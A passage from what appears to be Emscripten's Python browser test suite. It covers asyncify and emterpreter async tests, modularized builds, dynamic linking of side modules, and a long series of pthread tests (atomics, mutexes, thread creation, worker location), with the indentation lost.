# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify - yield-specific')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
if self.is_wasm_backend() and '--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args:
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
